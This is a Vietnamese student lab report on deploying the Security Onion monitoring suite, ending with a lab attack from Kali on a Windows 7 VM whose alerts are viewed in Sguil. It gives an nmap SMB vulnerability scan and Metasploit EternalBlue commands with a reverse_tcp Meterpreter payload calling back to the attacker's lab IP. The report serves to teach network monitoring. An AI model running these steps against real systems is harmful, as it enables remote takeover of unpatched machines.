Triển khai hệ thống giám sát an toàn thông tin Security Onion
Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (2.03 MB, 28 trang )
HỌC VIỆN KỸ THUẬT MẬT MÃ
KHOA AN TỒN THƠNG TIN
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
BÀI TẬP MƠN
QUẢN TRỊ AN TỒN HỆ THỐNG
TRIỂN KHAI HỆ THỐNG GIÁM SÁT ATTT
SECURITY ONION
Giảng viên : Ths. Cao Minh Tuấn
Sinh viên thực hiện:
Lớp :
HÀ NỘI, 2021
MỤC LỤC
TRIỂN KHAI HỆ THỐNG GIÁM SÁT ATTT SECURITY ONION
1.1. Chuẩn bị
- 01 máy người dùng chạy hệ điều hành Windows 7 có kết nối vào LAN.
- 01 máy ảo chạy hệ điều hành Kali Linux kết nối cùng với LAN của
Windows 7 để thực hiện xâm nhập mạng.
- 01 máy chủ cài đặt công cụ Security Onion để giám sát mạng.
1.2. Mơ hình triển khai
-2-
1.3. Các bước thực hiện
Cài đặt công cụ Security Onion
- Cài đặt Security Onion
- Cấu hình Security Onion
Thực hiện tấn cơng và phân tích cảnh báo trên hệ thống giám sát.
1.4. Thực hiện
1.4.1. Cài đặt công cụ Security Onion
Bấm chọn New Virtual Machine để tạo một máy ảo mới, sau đó thêm file ISO
và bấm Next để tiếp tục:
Chọn hệ điều hành Linux và version Ubuntu sau đó bấm Next để tiếp tục:
Đặt tên cho máy ảo tại mục name và chọn đường dẫn tại mục location:
Cài đặt các thông số cho máy ảo và bấm Close để kết thúc quá trình tạo mới.
Giao diện chính xuất hiện, chọn Install để chuyển đến giao diện cài đặt.
Chọn ngôn ngữ cài đặt là English, chọn Next để tiếp tục.
Thiết lập loại cài đặt, tại đây chọn Erase disk and install Security Onion (dọn
dẹp ổ đĩa và cài đặt Security Onion). Bấm chọn Install Now để cài đặt ngay.
Giao diện tiếp theo lựa chọn loại bàn phím English (US) :
Đặt tên máy và mật khẩu thích hợp, chọn Require my password to log in để
yêu cầu mật khẩu mỗi lần đăng nhập :
Giao diện cài đặt xuất hiện như hình sau :quá trình cài đặt mất vài phút
Q trình cài đặt hồn tất, thốt khỏi cửa sổ cài đặt. Bấm chọn Restart Now để
khởi động lại và lưu lại tồn bộ thơng số trong q trình cài đặt.
Q trình cài đặt thành cơng.
1.4.2.
Cấu hình Security Onion
Bấm chọn Set up icon để bắt đầu quá trình cấu hình :
Giao diện cấu hình như sau, xuất hiện các công cụ được hỗ trợ trong bộ công
cụ Security Onion. Bấm Yes và tiếp tục.
Tại bước này bỏ qua việc cấu hình mạng bằng cách chọn Yes, skip network
configuration.
Giao diện tiếp theo lựa chọn chế độ, chọn chế độ Production Mode (cấu hình bằng
tay thay vì cấu hình tự động).
Bấm chọn New để tạo mới máy chủ Security Onion :
Tạo tài khoản để đăng nhập vào các dịch vụ Kibana, Squert, Sguil trong Security
Onion với tên là kma3:
Thiết lập mật khẩu cho tài khoản đăng nhập trên, yêu cầu mật khẩu với độ dài tối
thiếu là 6 ký tự. Thực hiện xác nhận lại mật khẩu ở bước sau :
Giao diện tiếp theo lựa chọn bộ luật IDS mong muốn sử dụng, chọn Emerging
Threats Open (các mối đe dọa mới ) :
Tiếp theo chọn IDS engine, tại bước trên chọn luật Emerging Threats sẽ chọn engine
là Suricata :
Cài đặt định dạng IP cho HOME_NET (có thể để mặc định). Sau đó click chọn “OK”
Nhập dung lượng không gian lưu trữ (GB), tối thiểu 19GB, sau đó nhấp “OK”
1.4.2. Thực hiện tấn cơng và phân tích cảnh báo
Khởi động máy Kali Linux và máy trạm Win 7, thiết lập địa chỉ IP. Từ máy
attacker Kali thực hiện tấn công metaspolit đến máy victim windows 7, sử dụng
công cụ Sguil để thu thập và phân tích các cảnh báo.
Đăng nhập bằng tài khoản và mật khẩu đã cấu hình vào Sguil trên giao diện
Security Onion.
Chọn vùng mạng cần giám sát, ở đây thiết lập card mạng ens33. Tích chọn
Start SGUIL để đi đến giao diện giám sát .
Thực hiện ping kiểm tra kêt nối từ máy attacker tới máy win 7. Theo dõi
cảnh báo trên Sguil.
Quá trình ping thực hiện 6 gói tin đồng thời trên Sguil cũng hiển thị được gói
tin này và đếm được đúng 6 gói tin với thời gian thực:
Tại gói ICMP thấy địa chỉ IP nguồn 192.168.2.128 và địa chỉ IP đích
192.168.2.129 được hiển thị với Protocol = 1 (ICMP).
Có Event Message là GPL đây là luật cảnh báo cũ của Snort, phía sau là tên
đính kèm cảnh báo
Khi trỏ tới gói ICMP, Sguil hiển thị ra một vùng hiển thị chi tiết gói tin đó:
Tích Show Packet Data và Show Rules để xem chi tiết
Phía trên cùng là các luật: ở đây là luật cảnh báo ICMP (alert icmp)
Phía dưới là thơng tin của IP Header được chỉ ra như Version = 4,
HeaderLength = 5 ,Time to live = 64 chỉ ra hệ điều hành Linux.
Tiếp theo là thông tin kiểu thông báo ICMP: với code 0 và type =8 tức là kiểu
Echo Request
Phần còn lại là Data 56 byte
Thực hiện dò quét cổng trên máy Attacker tới máy Win 7 bằng nmap.
Sau khi xong thấy danh sách cổng mở trên win 7.
Phía bên Sguil cũng thu thập và đưa ra cảnh báo ngay lập tức:
Có 6 cảnh báo ET được đưa ra tương ứng với 6 mối đe dọa từ việc dò quét
cổng.
Thực hiện với Protocol = 6 = TCP
Phía dưới vẫn là các luật và thông tin thu thập được. Phần Data = None tức là
gói này khơng mang data.
Tấn cơng vào cổng 445 do phần trên quét thấy cổng 445 là open
# nmap –script smb-vuln* -p445 192.168.2.129
Tấn công smb với vulnerable cho được một số lỗ hổng trên windows 7
đặc biệt là lỗ hổng ms17-010, khai thác lỗ hổng này có thể chiếm quyền kiểm
sốt máy nạn nhân.
Công cụ Sguil cũng thu thập được những khả năng tấn cơng này:
Tương tự cũng có cảnh báo khi Attacker thực hiện trên cổng 445, giao
thức sử dụng là TCP = 6
Thực hiện tấn công bằng metasploit
Khởi động metasploits và thực hiện tìm kiếm lỗ hổng trong
database
metasploits.
Sử dụng câu lệnh “use
exploit/windows/smb/ms17_010_eternalblue” để vào khai thác lỗ
hổng.
Tiến hành cài đặt cho các thông số như LHOST, RHOST bằng các
câu
lệnh sau:
“set LHOST 192.168.2.128”: địa chỉ ip máy attacker
“set RHOST 192.168.2.129”: địa chỉ ip máy victim
Lựa chọn sử dụng payload để khai thác: “set payload
windows/meterpreter/reverse_tcp
Tại máy Kali Linux, ta sẽ nhận được thông báo đã mở 1
phiên kết nối tới máy Windows 7.
Quay lại Sguil cũng nhận được thông tin cuộc tấn cống và cảnh báo:
